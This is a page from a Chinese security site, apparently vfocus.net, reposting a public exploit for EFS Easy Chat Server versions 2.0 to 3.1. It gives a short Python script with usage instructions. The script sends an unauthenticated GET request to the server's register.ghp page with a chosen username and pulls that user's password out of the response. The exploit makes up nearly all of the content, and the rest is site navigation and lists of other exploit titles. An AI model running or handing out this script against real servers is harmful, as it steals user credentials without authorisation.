首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EFS Easy Chat Server 3.1 - Password Disclosure
来源:vfocus.net 作者:Mohsin 发布时间:2017-06-13  
# Exploit Title: Easy Chat Server Remote Password Disclosure
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Disclosure
# Severity: Critical
 
# =========================================================================================================
#   Registeration page 'register.ghp' allows disclosing ANY user's password.
# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password.
# =========================================================================================================
 
# USAGE: python exploit.py ip username
 
#!/usr/bin/python
 
import urllib
import re
import requests
import sys
 
ip = sys.argv[1]
username = sys.argv[2]
 
url = 'http://' + ip + '/register.ghp?username=' + username + '&password='
response = requests.get(url)
html = response.content
 
pattern = '<INPUT type="password" name="Password" maxlength="30"  value="(.+?)">'
result = re.compile(pattern)
 
password = re.findall(result,html)
 
x = ''.join(password)
 
password = x.replace("[", "")
password = x.replace("]", "")
 
print "Password: " + password
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VMware vSphere Data Protection
·EFS Easy Chat Server 3.1 - Pas
·IPFire 2.19 - Remote Code Exec
·EFS Easy Chat Server 3.1 - Buf
·Apple macOS - Disk Arbitration
·Disk Sorter 9.7.14 - 'Input Di
·Apple macOS 10.12.3 / iOS < 10
·Logpoint < 5.6.4 - Unauthentic
·Mapscrn 2.03 - Local Buffer Ov
·DiskBoss 8.0.16 - 'Input Direc
·VMware Workstation 12 Pro - De
·Sync Breeze 9.7.26 - 'Add Excl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved